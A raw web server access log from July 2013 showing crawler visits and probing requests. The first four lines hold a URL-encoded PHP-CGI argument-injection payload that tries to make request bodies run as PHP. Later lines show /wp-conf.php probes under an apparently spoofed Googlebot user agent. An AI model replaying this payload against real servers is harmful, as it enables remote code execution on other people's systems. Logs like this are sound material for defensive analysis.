217.160.211.72 - - [07/Jul/2013:20:42:50 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 316 "-" "-"
217.160.211.72 - - [07/Jul/2013:20:42:52 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 316 "-" "-"
217.160.211.72 - - [07/Jul/2013:20:42:52 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 316 "-" "-"
217.160.211.72 - - [07/Jul/2013:20:42:54 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 316 "-" "-"
188.40.101.205 - - [07/Jul/2013:20:49:02 +0200] "GET /wp-conf.php HTTP/1.1" 400 7463 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
188.40.101.205 - - [07/Jul/2013:20:52:20 +0200] "GET /wp-conf.php HTTP/1.1" 400 7454 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
188.40.101.205 - - [07/Jul/2013:21:12:08 +0200] "GET /wp-conf.php HTTP/1.1" 400 7511 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
173.199.116.27 - - [07/Jul/2013:21:27:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)"
188.40.101.205 - - [07/Jul/2013:22:35:21 +0200] "GET /wp-conf.php HTTP/1.1" 400 7495 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
64.246.165.10 - - [07/Jul/2013:22:48:27 +0200] "GET /robots.txt HTTP/1.0" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.10 - - [07/Jul/2013:22:48:27 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/bauaufzuege-hebetechnik.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.11.94 - - [08/Jul/2013:03:42:23 +0200] "GET /robots.txt HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.11.94 - - [08/Jul/2013:03:42:23 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/bmt-it.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
176.9.120.195 - - [08/Jul/2013:03:47:51 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; SearchmetricsBot; http://www.searchmetrics.com/en/searchmetrics-bot/)"
176.9.120.195 - - [08/Jul/2013:03:47:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SearchmetricsBot; http://www.searchmetrics.com/en/searchmetrics-bot/)"
64.246.165.140 - - [08/Jul/2013:03:53:54 +0200] "GET /robots.txt HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.140 - - [08/Jul/2013:03:53:55 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/boedenundmehr.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
